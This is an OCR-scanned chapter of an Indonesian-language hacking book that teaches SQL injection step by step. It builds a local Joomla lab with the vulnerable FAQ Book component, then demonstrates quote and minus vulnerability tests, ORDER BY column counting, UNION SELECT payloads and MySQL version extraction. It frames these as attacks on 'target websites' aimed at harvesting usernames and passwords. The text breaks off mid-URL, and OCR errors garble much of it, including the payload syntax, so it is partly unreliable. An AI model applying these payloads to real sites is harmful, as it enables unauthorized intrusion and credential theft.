BAB 04 


Sa 


Step by Step 
SOAL Injection Attack 


Dalam bab ini Anda akan melihat bagaimana aksi SAL Injection 
bekerja. Apa yang dijelaskan dalam bab ini akan menjadi panduan 
untuk Anda, langkah-langkah apa saja yang perlu dilakukan dalam 
melakukan SAL Injection. Subbab berikutnya ditulis secara beru- 
rutan, sehingga Anda bisa memahami sistem kerja SAL Injection 
dengan lebih mudah. Namun, perlu Anda ketahui, setelah mempela- 
jari bab ini, bukan berarti semua prosedur harus Anda ikuti semua- 
nya, karena Anda bisa mencari tahu bagian mana saja yang Anda 
perlukan dan bagian mana yang tidak. Misalnya, jika Anda merasa 
tidak perlu melakukan pemeriksaan terhadap versi MySgl, Anda bisa 
saja melewatinya. 


Awalnya, bab ini saya isi dengan teori penjelasan saja. Setelah saya 
pikir-pikir, apabila hanya sekadar penjelasan saja, sepertinya agak 
susah bagi Anda untuk memahami konsep SAL Injection yang 
sebenarnya. Supaya lebih mudah dicerna, sambil Anda memahami 
perintah untuk melakukan SAL Injection, akan lebih mudah di- 
mengerti jika Anda mempraktikkannya. 


Karena Anda bisa sekaligus belajar secara langsung. Istilahnya, 
Learning by doing. Oleh karena itulah, bab ini akan saya awali 
dengan membangun semacam laboratorium SOAL Injection. Sehingga 
Anda memiliki sebuah wadah yang bisa Anda dayagunakan untuk 
mencoba berbagai syntax SOAL Injection. 
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Wadah yang kita gunakan di sini adalah dengan memanfaatkan 
celah keamanan pada sebuah komponen yang dipasang pada CMS 
Joomla. Walau demikian, pembahasan yang ada di sini adalah 
landasan atau dasar-dasar bagi Anda untuk melakukan SOAL 
Injection. Karena nantinya kita akan membahas mengenai SOAL 
Injection pada Joomla dalam bab tersendiri. 


Perlu Anda ketahui, saya tidak akan menjelaskan bagaimana cara 
melakukan instalasi Joomla. Silakan Anda cari sendiri informasinya 
karena ada banyak buku yang membahas mengenai hal ini. Di sini 
saya menggunakan Joomla versi 1.6, jika Anda ingin menginstalnya 
dari localhost, Anda bisa menggunakan file yang disediakan dalam 
Bonus CD buku ini. 


Setelah melakukan instalasi Joomla, Anda bisa membuka tampilan 
Joomla yang telah diinstal pada localhost maupun pada webhosting. 
Berikut ini tampilan halaman pertama Joomla. 


File Edit View History Bookmarks Tools Help 
& localhost/joomla 


1 25 Most Visited Getting Started 2: Latest Headlines Login Domain 


@Home x | B8 Wyctoria - Administration | 4 | 


Fontsize Bigger Reset | Smaller| Search 


HOME SAMPLE SITES JOOMLA.ORG 


7? Joomla!" 


Open Source Content Management 


You are here: Home 


About Joomla! Joomla! 


Getting Started Congratulations! You have a Joomla! site! Joomla! makes your site easy to build a website just the way you want it and keep 


Uap Jowo it simple to update and maintain 
Joomla! is a flexible and powerful platform, whether you are building a small site for yourself or a huge site with hundreds of 
The Joomla! Project 
thousands of visitors. Joomla is open source, which means you can make it work just the way you want it to. 


The Joomla! Community 
Beginners Upgraders Professionals 
This Site ks 


Done 


Gambar 4.1 Tampilan utama Joomla 


Selanjutnya, kita akan memasang komponen yang bernama Minitek 
FA@ Book versi 1.3. Untuk melakukan hal ini, silakan ikuti langkah 
berikut: 
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1. Pertama-tama login ke dalam halaman administrator Joomla, 
yang terdapat pada: http://localhost/joomla/administrator/, 
lalu masukkan password administrator yang Anda gunakan 
sewaktu instalasi. 


Joomla! Administration Login 


Use a valid username and password 
to gain access to the administrator 


backend. User Name 
Go to site home page 
Password 
XX Language Default - 


Gambar 4.2 Halaman login Joomla 


2. Setelah berhasil login maka Anda telah memasuki halaman 
administrasi Joomla. 


Administration $ Joomla! 
Site — Users  Menus — Content ' Components  Extensions — Help di None Logged-in frontend dk 1 Logged-inbackend |»' O Messages MM View Site @ Logout 
Tm “ Last 5 Logged-in Users 
- Name Location » Logout 


Add New Article Article Manager Category Manager Media Manager Super User Administrator 


Eh db — wc 


Language Manager — Global Configuration Template Manager Edit profie 


? Top 5 Popular Articles 
» Last 5 Added Articles 


Gambar 4.3 Halaman administrasi Joomla 


3. Arahkan mouse pada bagian Extensions lalu klik Extensions 
Manager. 
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| Extensions Help 


M4 Extension Manager 


Module Manager 


&& Plug-in Manager 


Template Manager 


i 


K&' Language Manager 
Gambar 4.4 Menu Extensions 


Kini Anda siap untuk melakukan instalasi komponen Joomla. 
Dari halaman Extension Manager, pada bagian Package File, 
klik tombol Browse untuk mencari file instalasi komponen 
yang terdapat dalam Bonus CD buku ini dengan nama 
com fagbook 1 3. Setelah itu, klik tombol Upload & Install. 


Extension Manager: Install 


Options Help 
Install | Update | Manage | Discover Warnings 


Upload Package File 
Package File 


JErBukuiSOL InjecvonlsofwareiJoomlalcom fagbook 1 3.zp |/Browse- |) | Upload & Install 


Install from Directory 


Install Directory (Cixamppihtdocsioomlatmp 


Install from URL 


Install URL http:// 


Gambar 4.5 Extension Manager 


Apabila muncul pesan Installing component was successful, 


berarti proses pemasangan komponen baru telah berhasil 
dilakukan. 


w Installing component was successiful. 
Gambar 4.6 Instalasi komponen berhasil 


Sekarang kita akan mulai menggunakan component Joomla 
FAA Book tersebut. Dengan cara arahkan mouse Anda pada 
bagian Components, lalu pilih FA@ Book dan klik Dashboard. 
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| Components | Extensions He 


#& Banners r 4 


FE Contacts » 


(II FAO Book Wa dashboard 


rs Messaging categories 
M Newsfeeds P faas 
SS Redirect about 

| Search 


5 
|G Wweblinks — ? 


Gambar 4.7 Menu FA@ Book 


Berikut ini tampilan dari Dashboard component FA@ Book. 


PI Dashboard: FA@ Book AB 


Options 


Dashboard Categories FAOS About 


w ” Welcome to FAA Book 
“ 


FAO Book is a Freguently Asked Auestions 
Directory brought to you by Minitek 


Categories FAOs About 
Iryou need support or found any bugs just contact us at 
http://www.minitek.gr/contact 


Before you start using FAO Book, read the documentation 
FAO Book Documentation 


Ifyou use FAA Book, please submit a review at the JED 


Gambar 4.8 Dashboard FA@A Book 


Pertama-tama kita akan membuat sebuah kategori baru 
dengan mengklik ikon Categories. Dari halaman Categories 
yang muncul, klik pada ikon New yang berbentuk tanda 
tambah, untuk menambahkan sebuah kategori baru. 


Category Manager: FA@ @OO |v Nom 


New Edit Publish Unpublish | Archive Checkin Trash | Rebuid Options Help 


Book 


Dashboard Categories FAOS About 


Filter: 


Search | Clear - Select Max Levels- (w)) |- Select State - (wi) | - Select Acoess - P3 


- Select Language - (| 


Ordering & 
Title al 


Published & Access — Language ID 


Display #20 (ae 


Batch process the selected categories 


Set Access Level | - Keep original Access Levels - 


Select Category for Move/Copy 


Selet (ml Copy @ Move 


Process || Clear 


Gambar 4.9 Membuat kategori 


9. Isilah data mengenai kategori tersebut, sesuai dengan yang 
Anda inginkan. Setelah selesai, klik tombol Save & Close yang 
terdapat pada bagian atas. 


Sav Save& New Cancel | Help 


o Category Manager: Add A New FA@ Book Category “ LI e @ 34 


Details — - 
“ Publishing Options 
SOAL Injection 
Titie AL Injet Created by Select 3 User Select User 
Alias 
Parent -No parent - ( — 
» Basic Options 
State Published - 1, 
? Metadata Options 
Access Public Isl 
Permissions Set Permissions 
Language AN Tel 
ID () 
Description 
B 7 U Styles "| Paragraph — | 
HE | LE J Dum 


— 2x ea 


Beberapa buku lain yang bisa Anda jadikan referensi untuk SOL Injection: 
1. Hacking Joornla 
2. Buku Sakti Hacker| 


Gambar 4.10 Save & Close 
10. Apabila tidak ada masalah maka akan muncul pesan Category 


successfully saved. Selain itu, Anda juga bisa melihat sebuah 
kategori baru telah dibuat. Selanjutnya, klik menu FA@s. 


78 


Category Manager: FAA Book Ka G (v) (e) i v“ U Cc 24 


New Edit Publish — Unpubiish Archive Check in Trash Rebuiki Options Help 
(z2) Category successfully saved 
Filter: Search || Clear - Select Max Levels- (ye) |- Select State-(w) | - Select Access - Ie) | - Select Language - (we) 
Ta Titie Published Ordering Access —” Language ID 
—— SOL Injection 
(AA 1 Public AI 
sakinjection 


Display #20 (xw 


Gambar 4.11 Membuat kategori berhasil 


11. Dari halaman FA@s yang muncul, klik pada ikon New yang 
berupa tanda tambah untuk mengisi FAO. 


FAOs Manager: FAO Book 12 EOO Hm 
-F) New Ml Edit Delete | Pubish Unpubish | Options 


Dashboard | Categories | FA@S | About 
Filter: Search Clear - Select State- (wi) | - Select Acoess- Im) | - Select Category - (mw 
aj @uestion & Answer Category Status Ordering Access Votes up Votes down Creator ID 


Display #20 (se) 


Gambar 4.12 Membuat FAA 


12. Buatlah FA@ yang Anda inginkan. Setelah selesai, klik tombol 
Save & Close. 


FAOs Manager: (New Faa7 “ ) 

- Save se MSave& New Cancel 
New FAA 

Ouestion Apa itu SOL Injection? 

Category SOL Injecton |.w 

Status Pubished Ja 
Access Pubio Tj 
ID () 
Answer 

BJ UX | stvies -! Paragraph 

2 F a| LE Y Om 


—e@sdx eja 


SOL Injection merupakan teknik untuk mengekseloitasi sebuah anlikasi web memakai data 
yang dikerikan Klien dalam guery SOL. 


Gambar 4.13 Save & Close 
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13. Apabila berhasil maka akan muncul pesan Item successfully 
saved. Selain itu, Anda juga bisa melihat sebuah item baru 
telah dibuat. 


FAOs Manager: FA@ Book 5 OKOO » 


w New Edit Delete | Publish Unpublish | Options 
Dashboard ategories | FA@s | About 


P7 Item successfully saved. 


Filter Search Clear - Select State- (ml) | - Select Access-(m) - Select Category - (mw 


Guestion& Answer Category Status Ordering Access Votes up Votes down Creator IM) 


Apa itu SOL 
Injection? 


SOL injection (AI 1 Public ) ) 0 1 


Display #20 Tm 


Gambar 4.14 Membuat FA@ berhasil 


14. Setelah membuat content untuk FA@ Book, sekarang kita 
akan memasang komponen tersebut pada halaman menu 
Joomla sehingga dapat diakses oleh publik. Dari halaman 
menu Joomla, arahkan mouse pada bagian Menus, lalu pilih 
User Menu dan klik Add New Menu Item. 


| Menus | Content Components Extens 
". MenuManager 
Ia User Menu Add New Menu item 

BM, Top r 

BM, About Joomla £ 

1S About 

M8, Australian Parks 
M Main Menu W p 

BM, Fruit Shop b 


Gambar 4.15 Membuat user menu 
15. Dari halaman yang tampil, aturlah beberapa hal, di antaranya 


pada bagian Menu Item Type, klik pada tombol Select dan dari 
tampilan yang muncul, pilih Fag Book Index. 
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16. Isikan Nama atau Judul untuk menu tersebut pada bagian 
Menu Title. Sedangkan pada bagian Menu Location, pilih Main 


Select a Menu Item 


Contacts 


Type: 


Articles 


List All Contact Categories 
List Contacts in a Category 
Single Contact 

Featured Contacts 


Newsfeeds 


Archived Articles 
Single Article 

List All Categories 
Category Blog 
Category List 
Featured Articles 
Create Article 


Search 


List All News Feed Categories 
List News Feeds in a Category 
Single News Feed 


Weblinks 


List Search Results 


Users Manager 


Login Form 

User Profile 

Edit User Profile 

Registration Form 

Username Reminder Reguest 
Password Reset 


Wrapper 


List All Web Link Categories 
List Web Links in a Category 
Submit a Web Link 


Iframe Wrapper 


fagbook 


FAO Book Category 
FAO Book Index 


Gambar 4.16 FA@A Book Index 


3 P 4». 
8... Menu Manager: New Menu Item v an @ . 

2 Save ve& New Cancel | Help 

Details - - 

“ Link Type Options 
Menu Item Type FAO Boskindas rp —| 
Link Title Attribute 

Menu Title Hacking FAA — Link CSS Style 

Mas Link Image Select 

Note Clear 

Link index.php?option-com fagbook&view-fagbook Add Menu Title O No @ Yes 

State Pubished Tae) 

Access Pubtie - » Page Display Options 


Menu Location Main Manu Ta Pa ? Metadata Options 


Parent item Mara esa Root TN ? Module Assignment for this Menu Item 
Target Window Parent Ib 

Default Page & No D Yes 

Language Al - 

Template Style “Use Detaui - 2 

ID () 


Gambar 4.17 Menu Manager 


17. Setelah selesai, klik tombol Save & Close. 


18. Sekarang buka halaman depan Joomla, apabila sebelumnya 
Anda sudah pernah membuka halaman depan, lakukan 
Refresh. Maka sebuah menu baru akan muncul dengan nama 
yang Anda buat pada langkah sebelumnya. 


File Edit View History Bookmarks Tools Help 
1G. @ localhost/joomla 


(1 Getting Started 5 Latest Headlines | | Login Domain 


x | 58 Wetoria - Administration 


About Joomla! Joomla! 


Getting Started Congratulations! You have a Joomla! site! Joomla! makes your site easy to build a website just the way you want it and 


Using Joomla! keep it simple to update and maintain. 
Te Joomla! Project Joomla! is a flexible and powerful platform, whether you are building a small site for yourself or a huge site with hundreds 
ofthousands of visitors. Joomla is open source, which means you can make it work just the way you want it to. 


The Joomla! Community 


This Site 
Home 
Site Map 
Login 
Sample Sites 


Site Administrator 


Beginners 


Ifthis is your first Joomla site or 
your first web site, you have come 
to the right place. Joomla will help 
you get your website up and 
running guickly and easily 

Start off using your site by logging 
in using the administrator account 


you created when you installed 


Example Pages 
Hacking FAO 
ore: Beginners 


Login Form 


User Name 
http://localhost/joomla/index.php/hacking-fag 


Upgraders 


Ifyou are an experienced Joomla! 
1.5 user, 1.6 will seem very 
familiar. There are new templates 
and improved user interfaces, but 
most functionality is the same. The 
biggest changes are improved 
access control (ACL) and nested 


categories 


» Read more: Upgraders 


Professionals 


Joomla! 1.6 continues development 
of the Joomla Framework and CMS 
as a powerful and flexible way to 
bring your vision of the web to 
reality. With the administrator now 
fully MVC, the ability to control its 
look and the management of 


extensions is now complete 


? Read more: Professionals 


Gambar 4.18 Menu baru tampil di halaman Joomla 


Selanjutnya, kita akan memulai prosedur atau langkah-langkah dan 
cara melakukan SOL Injection. 


TES VULNERABILITAS 


Salah satu hal yang seolah-olah menjadi standar dalam melakukan 
aksi SAL Injection adalah melakukan tes vulnerabilitas terlebih 
dahulu. Pengujian atau tes ini perlu dilakukan untuk mengetahui 
apakah sebuah situs web memiliki celah keamanan atau tidak untuk 
dilakukan SOAL Injection. 


Salah satu karakter yang sering digunakan untuk melakukan tes 
vulnerabilitas adalah pemakaian karakter kutip tunggal (“). Selain 
menggunakan kutip tunggal, juga bisa menggunakan beberapa 
keyword SOAL tertentu. 
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Sebagai contoh, misalnya situs web target menggunakan URL seperti 
berikut ini: 


http://www.site.com/product.php?id-3 
Maka untuk melakukan tes vulnerabillitas, penulisan tanda kutip 


tunggal umumnya ditempatkan setelah angka 3. Penulisan karakter 
kutip tunggal, misalnya id-3'. 


Selain itu, pada beberapa kasus, tanda kutip tunggal juga bisa 
ditempatkan setelah tanda sama dengan, sehingga terlihat seperti 
berikut ini: 


http://www.situsweb.com/product.php?id-3' 
http://www.situsweb.com/product.php?id-'3 
Karakter lain yang juga sering dipakai untuk melakukan tes 
vulnerabilitas adalah tanda minus yang ditempatkan sebelum sebuah 


nilai. Misalnya, pada URL terdapat id-3 maka penempatan karakter 
tanda minus adalah sebelum angka 3, sehingga menjadi id--3. 


Apabila sewaktu Anda melakukan tes vulnerabilitas tersebut muncul 
pesan error, misalnya seperti di bawah ini: 


Warning: mysgl fetch array): supplied argument is not a valid 
MySOL result resource in /homel/michafj0/public himl/gallery.php 
on line 7 


Hal ini berarti situs web tersebut rentan atau memiliki vulnerabilitas 
untuk dilakukan serangan SOAL Injection. 


Bentuk pesan error yang sering tampil adalah: 
e  mysgl num rows() 

e mysgl numrows/) 

e mysgl fetch assoc/) 

e  mysgl result() 

e mysgl fetch array() 

e mysgl preg match/) 

e mysgl fetch row() 

e mysgl fetch objectl) 
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Pesan error yang muncul bisa saja bervariasi, selain itu pada 
beberapa kasus, kondisi error tidak hanya ditampilkan dengan kode 
error saja. Ada juga yang mengubah tampilan halamannya. Sebagai 
contoh, misalnya saya membuka sebuah situs web secara normal 


Error Occurred While Processing Reguest 
Server Error in '/' Application 

Microsoft OLE DB Provider for ODBC Drivers error 
error in your SOAL syntax 

Invalid Auerystring 

OLE DB Provider for ODBC 

VBScript Runtime 

ADODB.Field 

BOF or EOF 

ADODB.Command 

JET Database 

Syntax error 

include() 

GetArray () 

FetchRow() 

Input string was not in a correct format 


Microsoft VBScript: 


maka akan tampil seperti berikut ini. 
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Sinopsis y ficha tecnica Critica Galeria de fotos 


La oficial Ripley, despues de vagar varios afios por el espacio en estado de 
hibernacion, es finalmente encontrada. Durante el interrogatorio sobre lo ocurrido 
en la nave Nostromo tiene noticia de gue en el planeta en donde habia sido 
encontrado el organismo gue diezmo a su anterior tripulacion se ha instalado una 
base habitada por humanos. 


Director 


: James Cameron / Productora: Gale Anne Hurd para 20th Century Fox / 
Productores ejecutivos: Gordon Carroll, David Giler, Walter Hill / Guion: James 
Cameron, segin argumento de J3. Cameron, David Giler, Walter Hill, basado en los 
personajes de Dan O'Bannon, Ronald Shusett / Fotografia: Adrian Bidle / 
Musica: James Horner / Montaje: Ray Lovejoy / Efectos especiales: Mark 
Willians / Interpretes: Sigourney Weaver (Ellen Ripley), Lance Henriksen (Bishop), 
Carrie Henn (Rebecca "Newt' Jorden), Michael Biehn (Dwayne Hicks), Paul Reiser, 
Bill Paxton, Willian Hope, Jenette Goldstein, Al Mathews, Mark Rolston / 
Nacionalidad y aro: Estados Unidos 1986 / Duracion y datos tecnicos: 
154/137 min. color 1.85:1. 


Gambar 4.19 Contoh tampilan halaman normal 


Lalu sewaktu saya melakukan tes vulnerabilitas, pesan error tidak 
tampil. Yang muncul adalah perubahan tampilan halaman web. 
Biasanya perubahan tersebut adalah hilangnya isi atau content 
utama dari situs web tersebut. 


Sinopsis y ficha tecnica Critica Galeria de fotos 


Gambar 4.20 Isi halaman hilang 


Dalam kondisi nyata, terkadang Anda menemukan kasus lain. 
Misalnya, URL yang Anda peroleh adalah: 


http://www.situsweb.com/product.php?id-1&dog,catid-2 


Maka Anda bisa menggunakan teknik yang sama seperti di atas 
untuk melakukan pengujian. Beberapa variasi untuk melakukan 
pengujian pada URL seperti di atas adalah: 


http://www.situsweb.com/product.php?id-1&dog,catid-2' 
Atau menghapus string &dog:catid-2 
http://www.situsweb.com/product.php?id-1' 
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Bisa juga menempatkan tanda kutip pada kedua bagian tersebut. 


http://www.situsweb.com/product.php?id-'1&dog,catid- 2 


Pada dasarnya pemakaian tanda kutip tunggal dan juga tanda minus 
sudah umum. Sebenarnya, Anda juga bisa melakukan tes vulnera- 
bilitas menggunakan operasi pengurangan, misalnya 2-1. Contoh 
penerapannya adalah: 


http://www.situsweb.com/product.php?id-3 2-1-- 
Sebagai bahan praktik untuk Anda, kita sekarang akan mulai melakukan aksi 


SOL Injection pada komponen Joomla yang telah kita pasang seperti di awal 
bab ini. Ikuti langkah berikut: 


1. Buka halaman FAO yang telah Anda buat, perhatikan pada bagian URL- 
nya. 


Ra 
(@) Hacking FAO - Mozilla Fi 
File Edit View History Bookmarks Tools Help | 


& localhost/joomla/index.php 


acking-fag?vi ate - 


leh Most Visited ! Getting Started S5) Latest Headlines : : Login Domain 
| Hacking FAO | &- 
Gambar 4.21 URL situs web yang dibuka 
2. Jika dilihat, URL-nya adalah: http://localhost/joomla/index.php/hacking- 
fag?view—category&id—77 


3. Pertama-tama kita akan memeriksa apakah terdapat vulnerable atau tidak 
menggunakan tanda kutip tunggal setelah angka pada bagian id. 
Sehingga URL menjadi: http://localhost/joomla/index.php/hacking- 
fag?view—category&id-77” 


Perhatikan pada gambar di bawah ini, terlihat muncul error: 


Warning: Invalid argument supplied for foreach() in 
CxamppnhtdocsjoomlaNcomponentsicom fagbookWwiewsicategor 
WtmpNdefault.php on line 219 


Hal ini berarti kita bisa melakukan aksi SOL Injection. 
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(B) Hacking FAO - Mozilla 
File Edit View History Bookmarks Tools Help | 


(Bh Most Visited £“) Getting Started () Latest Headlines /) Login Domain 


| @ Hacking FA0 ll 


Font size Bigger Reset | Smaller Search. 


HOME SAMPLE SITES JOOMLA.ORG 


? Joomla!" Ka. 


Open Source Content Management 


You are here: Home » Hacking FAO 


1 
About Joomla! Warning: Invalid argument supplied for foreachf) in CAxamppihtdocsljoomlalcomponentsicom fagbookviews 


Acategoryitmpldefault.php on line 219 
Getting Started 
Using Joomla! 
The Joomla! Project 


The Joomla! Community 


This Site 


Done 


Gambar 4.22 Pesan error 


Dalam melakukan sebuah tes vulnerabilitas, kita sebaiknya mencoba 
beberapa jenis karakter yang telah dijelaskan. Sebab, terkadang 
apabila kita menggunakan sebuah karakter tidak menimbulkan efek 
apa pun, bisa jadi sewaktu menggunakan karakter lainnya efek atau 
kondisi error yang diharapkan bisa muncul. Hal ini karena adanya 
pembatasan pemakaian karakter khusus yang dilakukan oleh 
pemilik situs web. 


Inti dari tes vulnerabilitas ini adalah untuk menampilkan halaman 
error. Apabila sewaktu Anda menggunakan tanda kutip tunggal lalu 
halaman yang tampil tetap normal maka situs web tersebut tidak bisa 
kita lakukan SAL Injection. Tetapi jika ada perbedaan atau 
menampilkan pesan error maka situs web tersebut memiliki celah 
untuk diserang dengan SOL Injection. 


Saat melakukan tes vulnerabilitas, sebaiknya biarkan parameter lain 
yang ada di sekitarnya tidak berubah dengan data yang valid sebagai 
argumennya. Sebab, apabila kita memberikan argumen yang salah 
saat melakukan tes vulnerabilitas, bisa mempersulit untuk memas- 
tikan apakah sebuah situs web memiliki vulnerabilitas untuk mela- 
kukan aksi SOAL Injection atau tidak. 
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Sebagai contoh, berikut ini diberikan sebuah parameter yang benar. 
UserName-Joko”620Lelono&Address-Jawa 620Tengah 
Baris berikut ini akan menghasilkan ODBC error: 


UserName-Joko”620Lelono&SAddress-' x20OR 


Pemeriksaan dengan baris akan memberikan suatu error yang 
menandakan perlunya nilai untuk UserName: 


Address-' 


Perhatikan baris berikut: 
UserName-Joko”620Lelono&Address-' 


Akan memberikan halaman yang sama, seperti pada reguest yang 
tidak menentukan UserName sama sekali atau akan menampilkan 
halaman depan sebuah situs web. 


Karakter 5620 adalah encoded karakter yang akan saya jelaskan 
dalam bagian terakhir dari buku ini. 420 berarti sebuah spasi pada 
sebuah URL. 


MENENTUKAN JUMLAH KoLom 


Setelah Anda menemukan sebuah situs web target dan diketahui 
memiliki celah untuk dieksploitasi menggunakan SOL Injection, step 
berikutnya yang menjadi prosedur adalah menentukan berapa 
banyak jumlah kolom yang digunakan pada situs web target 
tersebut. Walaupun nanti setelah Anda terbiasa dengan SOAL Injection 
bagian ini, bisa saja Anda lompati. 


Penentuan jumlah kolom ini perlu dilakukan karena kita perlu 
mengetahui kolom mana dari sebuah tabel yang bisa dimanfaatkan. 
Hal ini bertujuan supaya kita bisa menggunakan perintah SOAL 
Injection dan juga mendapatkan hasil yang diinginkan pada lokasi 
yang tepat. Sebab, kalau kita memasukkan perintah SAL Injection 
pada tempat yang salah maka kita tidak akan memperoleh apa pun. 
Untuk melakukan hal ini agak bersifat 'trial and error, di mana 
perintah yang digunakan adalah ORDER BY. 


Perlu Anda ketahui juga bahwa SAL akan mengabaikan perintah 
yang digunakan, apakah menggunakan huruf kapital atau tidak, 
akan dianggap sama. Jadi, sewaktu Anda menggunakan perintah 
“order by' akan dianggap sama dengan “ORDER BY', maupun “Order 
By. 

Untuk menemukan jumlah kolom dalam situs web target, kita harus 
ORDER BY, sampai terjadi error. Misalnya, seperti berikut ini: 


http://www.situsweb.com/product.php?id-1 ORDER BY 1 -- (Web 
tetap tampil normal) 


http://www.situsweb.com/product.php?id-1 ORDER BY 2 -- (Web 
tetap tampil normal) 


http://www.situsweb.com/product.php?id-1 ORDER BY 3 -- (Web 
tetap tampil normal) 


http://www.situsweb.com/product.php?id-1 ORDER BY 4 -- (Web 
tetap tampil normal) 


http://www.situsweb.com/product.php?id-1 ORDER BY 5 -- (Terjadi 
Error) 
Dari contoh di atas, jumlah kolomnya berarti ada 4. 


Satu hal lagi, jangan lupa untuk menempatkan karakter -- (dua buah 
tanda minus) di akhir sebuah perintah. Tanda double minus ini 
dikenal juga dengan nama double null. 


Sekarang kita akan melakukan latihan, untuk mencari jumlah kolom dengan 
perintah order by. 


Masukkan URL: 


http://localhost/joomla/index.php/hacking-fag? view—category&id—77 order 
by 1-- 


Sewaktu saya menggunakan perintah order by I-- kondisi situs web tetap 
tampil normal. 
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Gambar 4.23 Halaman situs web tetap normal 


Kini saya mengganti order by menjadi order by 2-- 


http://localhost/joomla/index.php/hacking-fag?view—category&id—77 order 
by 2-- 


Situs web masih tampil normal. 
Proses seperti di atas harus dilakukan terus sampai muncul pesan error. 


http://localhost/joomla/index.php/hacking-fag?view—category&id—77 order 
by 3-- 5 Situs web masih normal dan tidak ada pesan error 


http://localhost/joomla/index.php/hacking-fag?view—category&id—77 order 
by 4-- 5 Situs web masih normal dan tidak ada pesan error 


http://localhost/joomla/index.php/hacking-fag?view—category&id—77 order 
by 5-- 5 Situs web masih normal dan tidak ada pesan error 


Sebagai tips tambahan, apabila Anda masih tidak menemukan kondisi error 
setelah 10x percobaan. Lakukan dengan angka kelipatan 10. 


http://localhost/joomla/index.php/hacking-fag?view—category&id—77 order 
by 10-— 5 Situs web masih normal dan tidak ada pesan error 
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http://localhost/joomla/index.php/hacking-fag? view—category&id—77 order 
by 20-— 5 Situs web masih normal dan tidak ada pesan error 


http://localhost/joomla/index.php/hacking-fag? view—category&id—77 order 
by 30-- 5 Situs web menampilkan pesan error 


Dengan cara di atas, kita bisa mencari pada nomor berapa error pertama kali 
muncul. Dalam hal ini kondisi error berarti berada antara 21 sampai dengan 
30. 


Maka kita gunakan kembali perintah order by. 


http://localhost/joomla/index.php/hacking-fag? view—category&id—77 order 
by 21- 5 Situs web masih normal dan tidak ada pesan error 


http://localhost/joomla/index.php/hacking-fag? view—category&id—77 order 
by 22-—- 5 Situs web masih normal dan tidak ada pesan error 


http://localhost/joomla/index.php/hacking-fag?view—category&id—77 order 
by 23-—- 5 Situs web masih normal dan tidak ada pesan error 


http://localhost/joomla/index.php/hacking-fag? view—category&id—77 order 
by 24— 5 Situs web masih normal dan tidak ada pesan error 


http://localhost/joomla/index.php/hacking-fag? view—category&id—77 order 
by 25—- 5 Situs web masih normal dan tidak ada pesan error 


http://localhost/joomla/index.php/hacking-fag? view—category&id—77 order 
by 26— 5 Situs web masih normal dan tidak ada pesan error 


http://localhost/joomla/index.php/hacking-fag? view—category&id—77 order 
by 27-- 5 Situs web menampilkan pesan error 


Selanjutnya apabila kita memasukkan order by 28, order by 29 dan 
seterusnya akan tetap terjadi error. Yang menjadi patokan kita adalah pada 
nomor berapa error untuk pertama kalinya terjadi. Oleh karena pesan error 
muncul sewaktu kita menggunakan order by 27 maka diperoleh jumlah 
kolom yang digunakan adalah sebanyak 26 (27-1). 
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Gambar 4.24 Pesan error tampil 


Sebagai bentuk modifikasi syntax dalam menggunakan order by ini 
adalah seperti berikut: 


http://localhost/joomla/index.php/hacking- 
fag?view-categorySid-77/“ “/Order/" “/by/” #/10-- 


Kita akan membahas mengenai modifikasi bentuk perintah tersebut 


dalam bab tersendiri. 


Sebagai tambahan informasi, untuk kasus Blind S@L Injection, 
perintah yang digunakan adalah AND (SELECT " FROM 
NAMA TABEL) - 1. 


Perintah ini dapat bekerja apabila Anda telah mengetahui nama 
tabelnya terlebih dahulu. 


MENCARI KOLOM YANG VULNERABLE 
Melangkah pada step berikutnya, dari penjelasan sebelumnya 


misalnya kita sudah mengetahui bahwa sebuah situs web target 
memiliki 26 kolom. Tugas kita selanjutnya adalah mencari pada 
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kolom ke berapa yang memiliki celah untuk dilakukan SOAL Injection. 
Istilah untuk mencari kolom yang vulnerable ini dikenal juga dengan 
sebutan mencari angka error, ada juga yang menyebutnya dengan 
istilah angka ajaib (magic number). Untuk melakukan hal ini, kita 
menggunakan perintah UNION SELECT. Namun ingat, tanda double 
minus tetap digunakan pada setiap akhir perintah. 


Bentuk penerapan kodenya adalah: 


http://localhost/joomla/index.php/hacking-fag?view—category&id—-77 
UNION SELECT 
1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,2 
4,25,26-- 


Dalam pemakaian UNION SELECT ini, masukkan kembali tanda minus 
setelah tanda sama dengan. Setelah Anda memasukkan perintah di atas maka 
Anda akan melihat adanya angka yang muncul dalam sebuah halaman web. 
Angka atau nomor tersebut merupakan kolom yang memiliki celah untuk 
dilakukan serangan SOL Injection. Dari nomor kolom itulah kita bisa melihat 
informasi yang kita perlukan, seperti username atau password. 


Ingat, angka 26 diambil dari banyaknya kolom yang kita peroleh dari 
langkah sebelumnya. 


Perhatikan pada gambar di bawah terlihat muncul angka 9. 
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Gambar 4.25 Sebuah angka error muncul 


93 


Sebagai contoh lain, berikut ini tampilan sebuah situs web yang 
menampilkan beberapa angka error sekaligus, yaitu angka 2 dan 3. 


Literatura Comics Foros Staff 


Sinopsis y ficha tecnica Critica Galeria de fotos 


Titulo: NN Director: NN 
Interpretes: NN 


Buscador Alfabetico: 
0/9|A/BIC|D/EI/F 
VIWI/XI/Y/Zz | Todos 


Gambar 4.26 Beberapa angka error muncul sekaligus 


Anda juga bisa memodifikasi bentuk perintah UNION SELECT 
menjadi: 


http://localhost/joomla/index.php/hacking- 
fag?view-categorySid-77/“ “/UNION/" “/SELECT/""/1,2,3,4,5,6,7 
'8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26— 


Setelah Anda menemukan angka error atau nomor kolom yang 
vulnerable, kita juga bisa mengubah nilai pada angka error dengan 
teks yang Anda inginkan untuk lebih meyakinkan Anda bahwa 
angka error tersebut memiliki celah keamanan. Untuk melakukan hal 
ini, Anda cukup memasukkan teks apa pun pada nomor angka error 
tersebut dalam tanda kutip. Untuk lebih jelas, coba lihat perintah di 
bawah ini. 


http://localhost/joomla/index.php/hacking-fag?view—category&id—-77 
UNION SELECT 1,2,3,4,5,6,7,8, SAL 
Injection'9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26-- 
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Gambar 4.27 Teks yang diketik tampil 


Apabila diperlukan Anda bisa mengubah tampilan angka yang tidak 
digunakan menjadi kata null atau angka 0. Sebagai contoh, kita 
sekaligus bisa mencari versi MySgl. 


http://localhost/joomla/index.php/hacking-fag?view-categorySid-- 
77 UNION SELECT 
null,null,null,null,null,null,null,null,0@version,null,null,null,null,null,nul 
Lnull,null,null,null,null,null,null,null,null,null,null— 


atau 


http://localhost/joomla/index.php/hacking-fag?view-categorySid-- 
